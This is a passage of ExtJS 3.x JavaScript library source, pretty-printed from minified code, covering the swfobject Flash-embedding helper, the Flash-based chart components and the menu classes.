Y = k.getElementById(aa)
} catch (Z) {
}
return Y
}
function D(Y) {
return k.createElement(Y)
}
function j(aa, Y, Z) {
aa.attachEvent(Y, Z);
J[J.length] = [aa, Y, Z]
}
function G(aa) {
var Z = N.pv, Y = aa.split(".");
Y[0] = parseInt(Y[0], 10);
Y[1] = parseInt(Y[1], 10) || 0;
Y[2] = parseInt(Y[2], 10) || 0;
return(Z[0] > Y[0] || (Z[0] == Y[0] && Z[1] > Y[1]) || (Z[0] == Y[0] && Z[1] == Y[1] && Z[2] >= Y[2])) ? true : false
}
function w(ad, Z, ae, ac) {
if (N.ie && N.mac) {
return
}
var ab = k.getElementsByTagName("head")[0];
if (!ab) {
return
}
var Y = (ae && typeof ae == "string") ? ae : "screen";
if (ac) {
o = null;
H = null
}
if (!o || H != Y) {
var aa = D("style");
aa.setAttribute("type", "text/css");
aa.setAttribute("media", Y);
o = ab.appendChild(aa);
if (N.ie && N.win && typeof k.styleSheets != E && k.styleSheets.length > 0) {
o = k.styleSheets[k.styleSheets.length - 1]
}
H = Y
}
if (N.ie && N.win) {
if (o && typeof o.addRule == s) {
o.addRule(ad, Z)
}
} else {
if (o && typeof k.createTextNode != E) {
o.appendChild(k.createTextNode(ad + " {" + Z + "}"))
}
}
}
function x(aa, Y) {
if (!n) {
return
}
var Z = Y ? "visible" : "hidden";
if (K && c(aa)) {
c(aa).style.visibility = Z
} else {
w("#" + aa, "visibility:" + Z)
}
}
function M(Z) {
var aa = /[\\\"<>\.;]/;
var Y = aa.exec(Z) != null;
return Y && typeof encodeURIComponent != E ? encodeURIComponent(Z) : Z
}
var d = function () {
if (N.ie && N.win) {
window.attachEvent("onunload", function () {
var ad = J.length;
for (var ac = 0; ac < ad; ac++) {
J[ac][0].detachEvent(J[ac][1], J[ac][2])
}
var aa = O.length;
for (var ab = 0; ab < aa; ab++) {
z(O[ab])
}
for (var Z in N) {
N[Z] = null
}
N = null;
for (var Y in swfobject) {
swfobject[Y] = null
}
swfobject = null;
window.detachEvent("onunload", arguments.callee)
})
}
}();
return{registerObject:function (ac, Y, ab, aa) {
if (N.w3 && ac && Y) {
var Z = {};
Z.id = ac;
Z.swfVersion = Y;
Z.expressInstall = ab;
Z.callbackFn = aa;
p[p.length] = Z;
x(ac, false)
} else {
if (aa) {
aa({success:false, id:ac})
}
}
}, getObjectById:function (Y) {
if (N.w3) {
return A(Y)
}
}, embedSWF:function (ac, ai, af, ah, Z, ab, aa, ae, ag, ad) {
var Y = {success:false, id:ai};
if (N.w3 && !(N.wk && N.wk < 312) && ac && ai && af && ah && Z) {
x(ai, false);
L(function () {
af += "";
ah += "";
var ak = {};
if (ag && typeof ag === s) {
for (var am in ag) {
ak[am] = ag[am]
}
}
ak.data = ac;
ak.width = af;
ak.height = ah;
var an = {};
if (ae && typeof ae === s) {
for (var al in ae) {
an[al] = ae[al]
}
}
if (aa && typeof aa === s) {
for (var aj in aa) {
if (typeof an.flashvars != E) {
an.flashvars += "&" + aj + "=" + aa[aj]
} else {
an.flashvars = aj + "=" + aa[aj]
}
}
}
if (G(Z)) {
var ao = v(ak, an, ai);
if (ak.id == ai) {
x(ai, true)
}
Y.success = true;
Y.ref = ao
} else {
if (ab && B()) {
ak.data = ab;
Q(ak, an, ai, ad);
return
} else {
x(ai, true)
}
}
if (ad) {
ad(Y)
}
})
} else {
if (ad) {
ad(Y)
}
}
}, switchOffAutoHideShow:function () {
n = false
}, ua:N, getFlashPlayerVersion:function () {
return{major:N.pv[0], minor:N.pv[1], release:N.pv[2]}
}, hasFlashPlayerVersion:G, createSWF:function (aa, Z, Y) {
if (N.w3) {
return v(aa, Z, Y)
} else {
return undefined
}
}, showExpressInstall:function (aa, ab, Y, Z) {
if (N.w3 && B()) {
Q(aa, ab, Y, Z)
}
}, removeSWF:function (Y) {
if (N.w3) {
z(Y)
}
}, createCSS:function (ab, aa, Z, Y) {
if (N.w3) {
w(ab, aa, Z, Y)
}
}, addDomLoadEvent:L, addLoadEvent:t, getQueryParamValue:function (ab) {
var aa = k.location.search || k.location.hash;
if (aa) {
if (/\?/.test(aa)) {
aa = aa.split("?")[1]
}
if (ab == null) {
return M(aa)
}
var Z = aa.split("&");
for (var Y = 0; Y < Z.length; Y++) {
if (Z[Y].substring(0, Z[Y].indexOf("=")) == ab) {
return M(Z[Y].substring((Z[Y].indexOf("=") + 1)))
}
}
}
return""
}, expressInstallCallback:function () {
if (a) {
var Y = c(S);
if (Y && m) {
Y.parentNode.replaceChild(m, Y);
if (R) {
x(R, true);
if (N.ie && N.win) {
m.style.display = "block"
}
}
if (F) {
F(C)
}
}
a = false
}
}}
}();
Ext.FlashComponent = Ext.extend(Ext.BoxComponent, {flashVersion:"9.0.115", backgroundColor:"#ffffff", wmode:"opaque", flashVars:undefined, flashParams:undefined, url:undefined, swfId:undefined, swfWidth:"100%", swfHeight:"100%", expressInstall:false, initComponent:function () {
Ext.FlashComponent.superclass.initComponent.call(this);
this.addEvents("initialize")
}, onRender:function () {
Ext.FlashComponent.superclass.onRender.apply(this, arguments);
var b = Ext.apply({allowScriptAccess:"always", bgcolor:this.backgroundColor, wmode:this.wmode}, this.flashParams), a = Ext.apply({allowedDomain:document.location.hostname, YUISwfId:this.getId(), YUIBridgeCallback:"Ext.FlashEventProxy.onEvent"}, this.flashVars);
new swfobject.embedSWF(this.url, this.id, this.swfWidth, this.swfHeight, this.flashVersion, this.expressInstall ? Ext.FlashComponent.EXPRESS_INSTALL_URL : undefined, a, b);
this.swf = Ext.getDom(this.id);
this.el = Ext.get(this.swf)
}, getSwfId:function () {
return this.swfId || (this.swfId = "extswf" + (++Ext.Component.AUTO_ID))
}, getId:function () {
return this.id || (this.id = "extflashcmp" + (++Ext.Component.AUTO_ID))
}, onFlashEvent:function (a) {
switch (a.type) {
case"swfReady":
this.initSwf();
return;
case"log":
return
}
a.component = this;
this.fireEvent(a.type.toLowerCase().replace(/event$/, ""), a)
}, initSwf:function () {
this.onSwfReady(!!this.isInitialized);
this.isInitialized = true;
this.fireEvent("initialize", this)
}, beforeDestroy:function () {
if (this.rendered) {
swfobject.removeSWF(this.swf.id)
}
Ext.FlashComponent.superclass.beforeDestroy.call(this)
}, onSwfReady:Ext.emptyFn});
Ext.FlashComponent.EXPRESS_INSTALL_URL = "http://swfobject.googlecode.com/svn/trunk/swfobject/expressInstall.swf";
Ext.reg("flash", Ext.FlashComponent);
Ext.FlashEventProxy = {onEvent:function (c, b) {
var a = Ext.getCmp(c);
if (a) {
a.onFlashEvent(b)
} else {
arguments.callee.defer(10, this, [c, b])
}
}};
Ext.chart.Chart = Ext.extend(Ext.FlashComponent, {refreshBuffer:100, chartStyle:{padding:10, animationEnabled:true, font:{name:"Tahoma", color:4473924, size:11}, dataTip:{padding:5, border:{color:10075112, size:1}, background:{color:14346230, alpha:0.9}, font:{name:"Tahoma", color:1393291, size:10, bold:true}}}, extraStyle:null, seriesStyles:null, disableCaching:Ext.isIE || Ext.isOpera, disableCacheParam:"_dc", initComponent:function () {
Ext.chart.Chart.superclass.initComponent.call(this);
if (!this.url) {
this.url = Ext.chart.Chart.CHART_URL
}
if (this.disableCaching) {
this.url = Ext.urlAppend(this.url, String.format("{0}={1}", this.disableCacheParam, new Date().getTime()))
}
this.addEvents("itemmouseover", "itemmouseout", "itemclick", "itemdoubleclick", "itemdragstart", "itemdrag", "itemdragend", "beforerefresh", "refresh");
this.store = Ext.StoreMgr.lookup(this.store)
}, setStyle:function (a, b) {
this.swf.setStyle(a, Ext.encode(b))
}, setStyles:function (a) {
this.swf.setStyles(Ext.encode(a))
}, setSeriesStyles:function (b) {
this.seriesStyles = b;
var a = [];
Ext.each(b, function (c) {
a.push(Ext.encode(c))
});
this.swf.setSeriesStyles(a)
}, setCategoryNames:function (a) {
this.swf.setCategoryNames(a)
}, setLegendRenderer:function (c, b) {
var a = this;
b = b || a;
a.removeFnProxy(a.legendFnName);
a.legendFnName = a.createFnProxy(function (d) {
return c.call(b, d)
});
a.swf.setLegendLabelFunction(a.legendFnName)
}, setTipRenderer:function (c, b) {
var a = this;
b = b || a;
a.removeFnProxy(a.tipFnName);
a.tipFnName = a.createFnProxy(function (h, e, g) {
var d = a.store.getAt(e);
return c.call(b, a, d, e, g)
});
a.swf.setDataTipFunction(a.tipFnName)
}, setSeries:function (a) {
this.series = a;
this.refresh()
}, bindStore:function (a, b) {
if (!b && this.store) {
if (a !== this.store && this.store.autoDestroy) {
this.store.destroy()
} else {
this.store.un("datachanged", this.refresh, this);
this.store.un("add", this.delayRefresh, this);
this.store.un("remove", this.delayRefresh, this);
this.store.un("update", this.delayRefresh, this);
this.store.un("clear", this.refresh, this)
}
}
if (a) {
a = Ext.StoreMgr.lookup(a);
a.on({scope:this, datachanged:this.refresh, add:this.delayRefresh, remove:this.delayRefresh, update:this.delayRefresh, clear:this.refresh})
}
this.store = a;
if (a && !b) {
this.refresh()
}
}, onSwfReady:function (b) {
Ext.chart.Chart.superclass.onSwfReady.call(this, b);
var a;
this.swf.setType(this.type);
if (this.chartStyle) {
this.setStyles(Ext.apply({}, this.extraStyle, this.chartStyle))
}
if (this.categoryNames) {
this.setCategoryNames(this.categoryNames)
}
if (this.tipRenderer) {
a = this.getFunctionRef(this.tipRenderer);
this.setTipRenderer(a.fn, a.scope)
}
if (this.legendRenderer) {
a = this.getFunctionRef(this.legendRenderer);
this.setLegendRenderer(a.fn, a.scope)
}
if (!b) {
this.bindStore(this.store, true)
}
this.refresh.defer(10, this)
}, delayRefresh:function () {
if (!this.refreshTask) {
this.refreshTask = new Ext.util.DelayedTask(this.refresh, this)
}
this.refreshTask.delay(this.refreshBuffer)
}, refresh:function () {
if (this.fireEvent("beforerefresh", this) !== false) {
var m = false;
var k = [], c = this.store.data.items;
for (var g = 0, l = c.length; g < l; g++) {
k[g] = c[g].data
}
var e = [];
var d = 0;
var n = null;
var h = 0;
if (this.series) {
d = this.series.length;
for (h = 0; h < d; h++) {
n = this.series[h];
var b = {};
for (var a in n) {
if (a == "style" && n.style !== null) {
b.style = Ext.encode(n.style);
m = true
} else {
b[a] = n[a]
}
}
e.push(b)
}
}
if (d > 0) {
for (h = 0; h < d; h++) {
n = e[h];
if (!n.type) {
n.type = this.type
}
n.dataProvider = k
}
} else {
e.push({type:this.type, dataProvider:k})
}
this.swf.setDataProvider(e);
if (this.seriesStyles) {
this.setSeriesStyles(this.seriesStyles)
}
this.fireEvent("refresh", this)
}
}, createFnProxy:function (a) {
var b = "extFnProxy" + (++Ext.chart.Chart.PROXY_FN_ID);
Ext.chart.Chart.proxyFunction[b] = a;
return"Ext.chart.Chart.proxyFunction." + b
}, removeFnProxy:function (a) {
if (!Ext.isEmpty(a)) {
a = a.replace("Ext.chart.Chart.proxyFunction.", "");
delete Ext.chart.Chart.proxyFunction[a]
}
}, getFunctionRef:function (a) {
if (Ext.isFunction(a)) {
return{fn:a, scope:this}
} else {
return{fn:a.fn, scope:a.scope || this}
}
}, onDestroy:function () {
if (this.refreshTask && this.refreshTask.cancel) {
this.refreshTask.cancel()
}
Ext.chart.Chart.superclass.onDestroy.call(this);
this.bindStore(null);
this.removeFnProxy(this.tipFnName);
this.removeFnProxy(this.legendFnName)
}});
Ext.reg("chart", Ext.chart.Chart);
Ext.chart.Chart.PROXY_FN_ID = 0;
Ext.chart.Chart.proxyFunction = {};
Ext.chart.Chart.CHART_URL = "http://yui.yahooapis.com/2.8.2/build/charts/assets/charts.swf";
Ext.chart.PieChart = Ext.extend(Ext.chart.Chart, {type:"pie", onSwfReady:function (a) {
Ext.chart.PieChart.superclass.onSwfReady.call(this, a);
this.setDataField(this.dataField);
this.setCategoryField(this.categoryField)
}, setDataField:function (a) {
this.dataField = a;
this.swf.setDataField(a)
}, setCategoryField:function (a) {
this.categoryField = a;
this.swf.setCategoryField(a)
}});
Ext.reg("piechart", Ext.chart.PieChart);
Ext.chart.CartesianChart = Ext.extend(Ext.chart.Chart, {onSwfReady:function (a) {
Ext.chart.CartesianChart.superclass.onSwfReady.call(this, a);
this.labelFn = [];
if (this.xField) {
this.setXField(this.xField)
}
if (this.yField) {
this.setYField(this.yField)
}
if (this.xAxis) {
this.setXAxis(this.xAxis)
}
if (this.xAxes) {
this.setXAxes(this.xAxes)
}
if (this.yAxis) {
this.setYAxis(this.yAxis)
}
if (this.yAxes) {
this.setYAxes(this.yAxes)
}
if (Ext.isDefined(this.constrainViewport)) {
this.swf.setConstrainViewport(this.constrainViewport)
}
}, setXField:function (a) {
this.xField = a;
this.swf.setHorizontalField(a)
}, setYField:function (a) {
this.yField = a;
this.swf.setVerticalField(a)
}, setXAxis:function (a) {
this.xAxis = this.createAxis("xAxis", a);
this.swf.setHorizontalAxis(this.xAxis)
}, setXAxes:function (c) {
var b;
for (var a = 0; a < c.length; a++) {
b = this.createAxis("xAxis" + a, c[a]);
this.swf.setHorizontalAxis(b)
}
}, setYAxis:function (a) {
this.yAxis = this.createAxis("yAxis", a);
this.swf.setVerticalAxis(this.yAxis)
}, setYAxes:function (c) {
var b;
for (var a = 0; a < c.length; a++) {
b = this.createAxis("yAxis" + a, c[a]);
this.swf.setVerticalAxis(b)
}
}, createAxis:function (b, d) {
var e = Ext.apply({}, d), c, a;
if (this[b]) {
a = this[b].labelFunction;
this.removeFnProxy(a);
this.labelFn.remove(a)
}
if (e.labelRenderer) {
c = this.getFunctionRef(e.labelRenderer);
e.labelFunction = this.createFnProxy(function (g) {
return c.fn.call(c.scope, g)
});
delete e.labelRenderer;
this.labelFn.push(e.labelFunction)
}
if (b.indexOf("xAxis") > -1 && e.position == "left") {
e.position = "bottom"
}
return e
}, onDestroy:function () {
Ext.chart.CartesianChart.superclass.onDestroy.call(this);
Ext.each(this.labelFn, function (a) {
this.removeFnProxy(a)
}, this)
}});
Ext.reg("cartesianchart", Ext.chart.CartesianChart);
Ext.chart.LineChart = Ext.extend(Ext.chart.CartesianChart, {type:"line"});
Ext.reg("linechart", Ext.chart.LineChart);
Ext.chart.ColumnChart = Ext.extend(Ext.chart.CartesianChart, {type:"column"});
Ext.reg("columnchart", Ext.chart.ColumnChart);
Ext.chart.StackedColumnChart = Ext.extend(Ext.chart.CartesianChart, {type:"stackcolumn"});
Ext.reg("stackedcolumnchart", Ext.chart.StackedColumnChart);
Ext.chart.BarChart = Ext.extend(Ext.chart.CartesianChart, {type:"bar"});
Ext.reg("barchart", Ext.chart.BarChart);
Ext.chart.StackedBarChart = Ext.extend(Ext.chart.CartesianChart, {type:"stackbar"});
Ext.reg("stackedbarchart", Ext.chart.StackedBarChart);
Ext.chart.Axis = function (a) {
Ext.apply(this, a)
};
Ext.chart.Axis.prototype = {type:null, orientation:"horizontal", reverse:false, labelFunction:null, hideOverlappingLabels:true, labelSpacing:2};
Ext.chart.NumericAxis = Ext.extend(Ext.chart.Axis, {type:"numeric", minimum:NaN, maximum:NaN, majorUnit:NaN, minorUnit:NaN, snapToUnits:true, alwaysShowZero:true, scale:"linear", roundMajorUnit:true, calculateByLabelSize:true, position:"left", adjustMaximumByMajorUnit:true, adjustMinimumByMajorUnit:true});
Ext.chart.TimeAxis = Ext.extend(Ext.chart.Axis, {type:"time", minimum:null, maximum:null, majorUnit:NaN, majorTimeUnit:null, minorUnit:NaN, minorTimeUnit:null, snapToUnits:true, stackingEnabled:false, calculateByLabelSize:true});
Ext.chart.CategoryAxis = Ext.extend(Ext.chart.Axis, {type:"category", categoryNames:null, calculateCategoryCount:false});
Ext.chart.Series = function (a) {
Ext.apply(this, a)
};
Ext.chart.Series.prototype = {type:null, displayName:null};
Ext.chart.CartesianSeries = Ext.extend(Ext.chart.Series, {xField:null, yField:null, showInLegend:true, axis:"primary"});
Ext.chart.ColumnSeries = Ext.extend(Ext.chart.CartesianSeries, {type:"column"});
Ext.chart.LineSeries = Ext.extend(Ext.chart.CartesianSeries, {type:"line"});
Ext.chart.BarSeries = Ext.extend(Ext.chart.CartesianSeries, {type:"bar"});
Ext.chart.PieSeries = Ext.extend(Ext.chart.Series, {type:"pie", dataField:null, categoryField:null});
Ext.menu.Menu = Ext.extend(Ext.Container, {minWidth:120, shadow:"sides", subMenuAlign:"tl-tr?", defaultAlign:"tl-bl?", allowOtherMenus:false, ignoreParentClicks:false, enableScrolling:true, maxHeight:null, scrollIncrement:24, showSeparator:true, defaultOffsets:[0, 0], plain:false, floating:true, zIndex:15000, hidden:true, layout:"menu", hideMode:"offsets", scrollerHeight:8, autoLayout:true, defaultType:"menuitem", bufferResize:false, initComponent:function () {
if (Ext.isArray(this.initialConfig)) {
Ext.apply(this, {items:this.initialConfig})
}
this.addEvents("click", "mouseover", "mouseout", "itemclick");
Ext.menu.MenuMgr.register(this);
if (this.floating) {
Ext.EventManager.onWindowResize(this.hide, this)
} else {
if (this.initialConfig.hidden !== false) {
this.hidden = false
}
this.internalDefaults = {hideOnClick:false}
}
Ext.menu.Menu.superclass.initComponent.call(this);
if (this.autoLayout) {
var a = this.doLayout.createDelegate(this, []);
this.on({add:a, remove:a})
}
}, getLayoutTarget:function () {
return this.ul
}, onRender:function (b, a) {
if (!b) {
b = Ext.getBody()
}
var c = {id:this.getId(), cls:"x-menu " + ((this.floating) ? "x-menu-floating x-layer " : "") + (this.cls || "") + (this.plain ? " x-menu-plain" : "") + (this.showSeparator ? "" : " x-menu-nosep"), style:this.style, cn:[
{tag:"a", cls:"x-menu-focus", href:"#", onclick:"return false;", tabIndex:"-1"},
{tag:"ul", cls:"x-menu-list"}
]};
if (this.floating) {
this.el = new Ext.Layer({shadow:this.shadow, dh:c, constrain:false, parentEl:b, zindex:this.zIndex})
} else {
this.el = b.createChild(c)
}
Ext.menu.Menu.superclass.onRender.call(this, b, a);
if (!this.keyNav) {
this.keyNav = new Ext.menu.MenuNav(this)
}
this.focusEl = this.el.child("a.x-menu-focus");
this.ul = this.el.child("ul.x-menu-list");
this.mon(this.ul, {scope:this, click:this.onClick, mouseover:this.onMouseOver, mouseout:this.onMouseOut});
if (this.enableScrolling) {
this.mon(this.el, {scope:this, delegate:".x-menu-scroller", click:this.onScroll, mouseover:this.deactivateActive})
}
}, findTargetItem:function (b) {
var a = b.getTarget(".x-menu-list-item", this.ul, true);
if (a && a.menuItemId) {
return this.items.get(a.menuItemId)
}
}, onClick:function (b) {
var a = this.findTargetItem(b);
if (a) {
if (a.isFormField) {
this.setActiveItem(a)
} else {
if (a instanceof Ext.menu.BaseItem) {
if (a.menu && this.ignoreParentClicks) {
a.expandMenu();
b.preventDefault()
} else {
if (a.onClick) {
a.onClick(b);
this.fireEvent("click", this, a, b)
}
}
}
}
}
}, setActiveItem:function (a, b) {
if (a != this.activeItem) {
this.deactivateActive();
if ((this.activeItem = a).isFormField) {
a.focus()
} else {
a.activate(b)
}
} else {
if (b) {
a.expandMenu()
}
}
}, deactivateActive:function () {
var b = this.activeItem;
if (b) {
if (b.isFormField) {
if (b.collapse) {
b.collapse()
}
} else {
b.deactivate()
}
delete this.activeItem
}
}, tryActivate:function (g, e) {
var b = this.items;
for (var c = g, a = b.length; c >= 0 && c < a; c += e) {
var d = b.get(c);
if (d.isVisible() && !d.disabled && (d.canActivate || d.isFormField)) {
this.setActiveItem(d, false);
return d
}
}
return false
}, onMouseOver:function (b) {
var a = this.findTargetItem(b);
if (a) {
if (a.canActivate && !a.disabled) {
this.setActiveItem(a, true)
}
}
this.over = true;
this.fireEvent("mouseover", this, b, a)
}, onMouseOut:function (b) {
var a = this.findTargetItem(b);
if (a) {
if (a == this.activeItem && a.shouldDeactivate && a.shouldDeactivate(b)) {
this.activeItem.deactivate();
delete this.activeItem
}
}
this.over = false;
this.fireEvent("mouseout", this, b, a)
}, onScroll:function (d, b) {
if (d) {
d.stopEvent()
}
var a = this.ul.dom, c = Ext.fly(b).is(".x-menu-scroller-top");
a.scrollTop += this.scrollIncrement * (c ? -1 : 1);
if (c ? a.scrollTop <= 0 : a.scrollTop + this.activeMax >= a.scrollHeight) {
this.onScrollerOut(null, b)
}
}, onScrollerIn:function (d, b) {
var a = this.ul.dom, c = Ext.fly(b).is(".x-menu-scroller-top");
if (c ? a.scrollTop > 0 : a.scrollTop + this.activeMax < a.scrollHeight) {
Ext.fly(b).addClass(["x-menu-item-active", "x-menu-scroller-active"])
}
}, onScrollerOut:function (b, a) {
Ext.fly(a).removeClass(["x-menu-item-active", "x-menu-scroller-active"])
}, show:function (b, c, a) {
if (this.floating) {
this.parentMenu = a;
if (!this.el) {
this.render();
this.doLayout(false, true)
}
this.showAt(this.el.getAlignToXY(b, c || this.defaultAlign, this.defaultOffsets), a)
} else {
Ext.menu.Menu.superclass.show.call(this)
}
}, showAt:function (b, a) {
if (this.fireEvent("beforeshow", this) !== false) {
this.parentMenu = a;
if (!this.el) {
this.render()
}
if (this.enableScrolling) {
this.el.setXY(b);
b[1] = this.constrainScroll(b[1]);
b = [this.el.adjustForConstraints(b)[0], b[1]]
} else {
b = this.el.adjustForConstraints(b)
}
this.el.setXY(b);
this.el.show();
Ext.menu.Menu.superclass.onShow.call(this);
if (Ext.isIE) {
this.fireEvent("autosize", this);
if (!Ext.isIE8) {
this.el.repaint()
}
}
this.hidden = false;
this.focus();
this.fireEvent("show", this)
}
}, constrainScroll:function (i) {
var b, d = this.ul.setHeight("auto").getHeight(), a = i, h, e, g, c;
if (this.floating) {
e = Ext.fly(this.el.dom.parentNode);
g = e.getScroll().top;
c = e.getViewSize().height;
h = i - g;
b = this.maxHeight ? this.maxHeight : c - h;
if (d > c) {
b = c;
a = i - h
} else {
if (b < d) {
a = i - (d - b);
b = d
}
}
} else {
b = this.getHeight()
}
if (this.maxHeight) {
b = Math.min(this.maxHeight, b)
}
if (d > b && b > 0) {
this.activeMax = b - this.scrollerHeight * 2 - this.el.getFrameWidth("tb") - Ext.num(this.el.shadowOffset, 0);
this.ul.setHeight(this.activeMax);
this.createScrollers();
this.el.select(".x-menu-scroller").setDisplayed("")
} else {
this.ul.setHeight(d);
this.el.select(".x-menu-scroller").setDisplayed("none")
}
this.ul.dom.scrollTop = 0;
return a
}, createScrollers:function () {
if (!this.scroller) {
this.scroller = {pos:0, top:this.el.insertFirst({tag:"div", cls:"x-menu-scroller x-menu-scroller-top", html:" "}), bottom:this.el.createChild({tag:"div", cls:"x-menu-scroller x-menu-scroller-bottom", html:" "})};
this.scroller.top.hover(this.onScrollerIn, this.onScrollerOut, this);
this.scroller.topRepeater = new Ext.util.ClickRepeater(this.scroller.top, {listeners:{click:this.onScroll.createDelegate(this, [null, this.scroller.top], false)}});
this.scroller.bottom.hover(this.onScrollerIn, this.onScrollerOut, this);
this.scroller.bottomRepeater = new Ext.util.ClickRepeater(this.scroller.bottom, {listeners:{click:this.onScroll.createDelegate(this, [null, this.scroller.bottom], false)}})
}
}, onLayout:function () {
if (this.isVisible()) {
if (this.enableScrolling) {
this.constrainScroll(this.el.getTop())
}
if (this.floating) {
this.el.sync()
}
}
}, focus:function () {
if (!this.hidden) {
this.doFocus.defer(50, this)
}
}, doFocus:function () {
if (!this.hidden) {
this.focusEl.focus()
}
}, hide:function (a) {
if (!this.isDestroyed) {
this.deepHide = a;
Ext.menu.Menu.superclass.hide.call(this);
delete this.deepHide
}
}, onHide:function () {
Ext.menu.Menu.superclass.onHide.call(this);
this.deactivateActive();
if (this.el && this.floating) {
this.el.hide()
}
var a = this.parentMenu;
if (this.deepHide === true && a) {
if (a.floating) {
a.hide(true)
} else {
a.deactivateActive()
}
}
}, lookupComponent:function (a) {
if (Ext.isString(a)) {
a = (a == "separator" || a == "-") ? new Ext.menu.Separator() : new Ext.menu.TextItem(a);
this.applyDefaults(a)
} else {
if (Ext.isObject(a)) {
a = this.getMenuItem(a)
} else {
if (a.tagName || a.el) {
a = new Ext.BoxComponent({el:a})
}
}
}
return a
}, applyDefaults:function (b) {
if (!Ext.isString(b)) {
b = Ext.menu.Menu.superclass.applyDefaults.call(this, b);
var a = this.internalDefaults;
if (a) {
if (b.events) {
Ext.applyIf(b.initialConfig, a);
Ext.apply(b, a)
} else {
Ext.applyIf(b, a)
}
}
}
return b
}, getMenuItem:function (a) {
a.ownerCt = this;
if (!a.isXType) {
if (!a.xtype && Ext.isBoolean(a.checked)) {
return new Ext.menu.CheckItem(a)
}
return Ext.create(a, this.defaultType)
}
return a
}, addSeparator:function () {
return this.add(new Ext.menu.Separator())
}, addElement:function (a) {
return this.add(new Ext.menu.BaseItem({el:a}))
}, addItem:function (a) {
return this.add(a)
}, addMenuItem:function (a) {
return this.add(this.getMenuItem(a))
}, addText:function (a) {
return this.add(new Ext.menu.TextItem(a))
}, onDestroy:function () {
Ext.EventManager.removeResizeListener(this.hide, this);
var a = this.parentMenu;
if (a && a.activeChild == this) {
delete a.activeChild
}
delete this.parentMenu;
Ext.menu.Menu.superclass.onDestroy.call(this);
Ext.menu.MenuMgr.unregister(this);
if (this.keyNav) {
this.keyNav.disable()
}
var b = this.scroller;
if (b) {
Ext.destroy(b.topRepeater, b.bottomRepeater, b.top, b.bottom)
}
Ext.destroy(this.el, this.focusEl, this.ul)
}});
Ext.reg("menu", Ext.menu.Menu);
Ext.menu.MenuNav = Ext.extend(Ext.KeyNav, function () {
function a(d, c) {
if (!c.tryActivate(c.items.indexOf(c.activeItem) - 1, -1)) {
c.tryActivate(c.items.length - 1, -1)
}
}
function b(d, c) {
if (!c.tryActivate(c.items.indexOf(c.activeItem) + 1, 1)) {
c.tryActivate(0, 1)
}
}
return{constructor:function (c) {
Ext.menu.MenuNav.superclass.constructor.call(this, c.el);
this.scope = this.menu = c
}, doRelay:function (g, d) {
var c = g.getKey();
if (this.menu.activeItem && this.menu.activeItem.isFormField && c != g.TAB) {
return false
}
if (!this.menu.activeItem && g.isNavKeyPress() && c != g.SPACE && c != g.RETURN) {
this.menu.tryActivate(0, 1);
return false
}
return d.call(this.scope || this, g, this.menu)
}, tab:function (d, c) {
d.stopEvent();
if (d.shiftKey) {
a(d, c)
} else {
b(d, c)
}
}, up:a, down:b, right:function (d, c) {
if (c.activeItem) {
c.activeItem.expandMenu(true)
}
}, left:function (d, c) {
c.hide();
if (c.parentMenu && c.parentMenu.activeItem) {
c.parentMenu.activeItem.activate()
}
}, enter:function (d, c) {
if (c.activeItem) {
d.stopPropagation();
c.activeItem.onClick(d);
c.fireEvent("click", this, c.activeItem);
return true
}
}}
}());
Ext.menu.MenuMgr = function () {
var h, e, b, d = {}, a = false, l = new Date();
function n() {
h = {};
e = new Ext.util.MixedCollection();
b = Ext.getDoc().addKeyListener(27, j);
b.disable()
}
function j() {
if (e && e.length > 0) {
var o = e.clone();
o.each(function (p) {
p.hide()
});
return true
}
return false
}
function g(o) {
e.remove(o);
if (e.length < 1) {
b.disable();
Ext.getDoc().un("mousedown", m);
a = false
}
}
function k(o) {
var p = e.last();
l = new Date();
e.add(o);
if (!a) {
b.enable();
Ext.getDoc().on("mousedown", m);
a = true
}
if (o.parentMenu) {
o.getEl().setZIndex(parseInt(o.parentMenu.getEl().getStyle("z-index"), 10) + 3);
o.parentMenu.activeChild = o
} else {
if (p && !p.isDestroyed && p.isVisible()) {
o.getEl().setZIndex(parseInt(p.getEl().getStyle("z-index"), 10) + 3)
}
}
}
function c(o) {
if (o.activeChild) {
o.activeChild.hide()
}
if (o.autoHideTimer) {
clearTimeout(o.autoHideTimer);
delete o.autoHideTimer
}
}
function i(o) {
var p = o.parentMenu;
if (!p && !o.allowOtherMenus) {
j()
} else {
if (p && p.activeChild) {
p.activeChild.hide()
}
}
}
function m(o) {
if (l.getElapsed() > 50 && e.length > 0 && !o.getTarget(".x-menu")) {
j()
}
}
return{hideAll:function () {
return j()
}, register:function (o) {
if (!h) {
n()
}
h[o.id] = o;
o.on({beforehide:c, hide:g, beforeshow:i, show:k})
}, get:function (o) {
if (typeof o == "string") {
if (!h) {
return null
}
return h[o]
} else {
if (o.events) {
return o
} else {
if (typeof o.length == "number") {
return new Ext.menu.Menu({items:o})
} else {
return Ext.create(o, "menu")
}
}
}
}, unregister:function (o) {
delete h[o.id];
o.un("beforehide", c);
o.un("hide", g);
o.un("beforeshow", i);
o.un("show", k)
}, registerCheckable:function (o) {
var p = o.group;
if (p) {
if (!d[p]) {
d[p] = []
}
d[p].push(o)
}
}, unregisterCheckable:function (o) {
var p = o.group;
if (p) {
d[p].remove(o)
}
}, onCheckChange:function (q, r) {
if (q.group && r) {
var t = d[q.group], p = 0, o = t.length, s;
for (; p < o; p++) {
s = t[p];
if (s != q) {
s.setChecked(false)
}
}
}
}, getCheckedItem:function (q) {
var r = d[q];
if (r) {
for (var p = 0, o = r.length; p < o; p++) {
if (r[p].checked) {
return r[p]
}
}
}
return null
}, setCheckedItem:function (q, s) {
var r = d[q];
if (r) {
for (var p = 0, o = r.length; p < o; p++) {
if (r[p].id == s) {
r[p].setChecked(true)
}
}
}
return null
}}
}();
Ext.menu.BaseItem = Ext.extend(Ext.Component, {canActivate:false, activeClass:"x-menu-item-active", hideOnClick:true, clickHideDelay:1, ctype:"Ext.menu.BaseItem", actionMode:"container", initComponent:function () {
Ext.menu.BaseItem.superclass.initComponent.call(this);
this.addEvents("click", "activate", "deactivate");
if (this.handler) {
this.on("click", this.handler, this.scope)
}
}, onRender:function (b, a) {
Ext.menu.BaseItem.superclass.onRender.apply(this, arguments);
if (this.ownerCt && this.ownerCt instanceof Ext.menu.Menu) {
this.parentMenu = this.ownerCt
} else {
this.container.addClass("x-menu-list-item");
this.mon(this.el, {scope:this, click:this.onClick, mouseenter:this.activate, mouseleave:this.deactivate})
}
}, setHandler:function (b, a) {
if (this.handler) {
this.un("click", this.handler, this.scope)
}
this.on("click", this.handler = b, this.scope = a)
}, onClick:function (a) {
